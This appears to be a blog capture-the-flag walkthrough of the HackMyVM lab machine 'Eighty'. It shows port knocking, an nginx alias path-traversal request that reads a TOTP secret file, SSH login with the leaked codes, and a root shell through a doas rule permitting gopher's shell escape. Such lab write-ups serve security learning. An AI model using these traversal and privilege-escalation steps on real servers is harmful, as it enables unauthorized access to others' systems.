security walkthrough hackmyvm writeup eighty

Writeup – Eighty – HackMyVM – Walkthrough

Eighty is a difficult machine from sML on the platform HackMyVM. This machine uses various techniques like knocking the ports out, analyzing the webserver and exploiting superuser permission. However, you can also say that the machine is relatively easy since everything is ahead of you. Furthermore, an experienced hacker can easily lay out the route to the root shell. “Writeup – Eighty – HackMyVM – Walkthrough”

Click here to download the vulnerable machine

The IP address of the target

❯ fping -aqg 10.0.0.0/24
10.0.0.1
10.0.0.2
10.0.0.3
10.0.0.4
10.0.0.201

In my case, the IP address of the target is 10.0.0.201.

Scan the open services

After we identify the target IP address, we have to scan the open ports on it.

❯ nmap -sC -sV -p- -oN nmap.log 10.0.0.201
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-15 08:53 +0545
Nmap scan report for eighty.hmv (10.0.0.201)
Host is up (0.00099s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 c9ced72af9482565a9334bd501e12c52 (RSA)
|   256 7e3d4db4820b13ebdb50e36070f04aad (ECDSA)
|_  256 7f9d13c87bd9371dcbffe9cef590c332 (ED25519)
70/tcp open     http    pygopherd web-gopher gateway
| gopher-ls: 
|_[txt] /howtoconnect.txt "Connection"
|_http-title: Gopher
80/tcp filtered http

There is a gopher service running on the machine which is a predecessor to HTTP (you can say). Likewise, the HTTP port, i.e. 80, is filtered. When I see a TCP port filtered, it is mostly by a firewall or a service called knock.

In knock, we need a sequence of ports to unlock the filtered port.

Check the gopher server

The nmap service scan also gave us the path on the server. Let’s directly look into it.

❯ curl http://10.0.0.201:70/howtoconnect.txt
Ping us to: 4767 2343 3142 

As we guessed, we have a sequence of numbers. Let’s unlock the port.

❯ knock 10.0.0.201 4767 2343 3142

Enumerate the webserver

Now, we have a /robots.txt path on the web server that gives us another path /nginx_backup. The file is a backup of the Nginx configuration.

❯ curl http://10.0.0.201/robots.txt
/nginx_backup.txt
❯ curl http://10.0.0.201/nginx_backup.txt
server {
        listen 80 default_server;
        listen [::]:80 default_server;
        root /var/www/html;
        index index.html index.htm index.nginx-debian.html;
        server_name _;
        location / {
                try_files $uri $uri/ =404;
        }
}

server {
server_name henry.eighty.hmv;
root /var/www/html;
index index.html index.htm index.nginx-debian.html;
        location /web {
                alias /home/henry/web/;
        }
  }

server {
server_name susan.eighty.hmv;
root /var/www/html;
index index.html index.htm index.nginx-debian.html;
        location /web {
                alias /home/susan/web/;
        }
  }

From the configuration, we know the following things.

  1. There are two virtual hosts, henry.eighty.hmv and susan.eighty.hmv.
  2. Each host is serving the /web directory inside their home directory.
  3. The location served in the server is /web
  4. The server is vulnerable to path traversal. This is because a trailing slash is missing in the location /web

Check this link for more information on the vulnerability.

I performed the directory scanning on both of the virtual hosts. The host susan had the password to login into the SSH server.

❯ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://susan.eighty.hmv/web -x php,html,txt -o medium-susan.log
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://susan.eighty.hmv/web
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
2023/01/15 09:01:22 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 40]
/lostpasswd.txt       (Status: 200) [Size: 50]

Let’s check the path /lostpasswd.txt.

❯ curl http://susan.eighty.hmv/web/lostpasswd.txt
<password redacted> + /home/susan/secret/.google-auth.txt

Further, we see that there is another layer of authentication. Here, the vulnerability comes into play because the web server is meant to serve the /web directory. However, we can reach the parent directories too.

❯ curl http://susan.eighty.hmv/web../secret/.google-auth.txt
2GN<totp key redacted>3UZPN3ZM
" RATE_LIMIT 3 30
" WINDOW_SIZE 17
" DISALLOW_REUSE
" TOTP_AUTH
71293338
48409754
27074208
60216448
17908010

This is a TOTP authentication. So, we can use any authenticator application (Google Authenticator, Microsoft Authenticator, Chrome extension authenticator). However, in this case the first option 71293338 also worked.

❯ ssh susan@10.0.0.201
(susan@10.0.0.201) Password: 
(susan@10.0.0.201) Verification code: 
Linux eighty 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr  7 07:05:11 2021
susan@eighty:~$ id
uid=1000(susan) gid=1000(susan) groups=1000(susan),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Root shell

To get to the root shell, we have a binary doas (read as ‘do as’). As the name suggests, this binary is similar to sudo. Moreover, we can read the config file (this is a vulnerability, not the binary).

susan@eighty:~$ whereis doas.conf
doas: /usr/local/bin/doas /usr/local/etc/doas.conf
susan@eighty:~$ cat /usr/local/etc/doas.conf 
permit nolog susan as root cmd gopher

Here, we see that the user susan can run the command gopher as root.

While checking the help file, I get to know that we can spawn a shell by using the ! or $ command in default mode.

Spawning your default shell.  Type 'exit' to return to Gopher.

root@eighty:/home/susan# cd
root@eighty:~# echo nepcodex.com;md5sum /etc/shadow
nepcodex.com
7f69b1af3f2cef837f04a09b813af4d9  /etc/shadow
root@eighty:~#

In this way, we can achieve the root shell in eighty. The notes for the machine are available here.

Checkout the writeup of the machine Lupinone from the HackMyVM platform.


5 1 vote
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments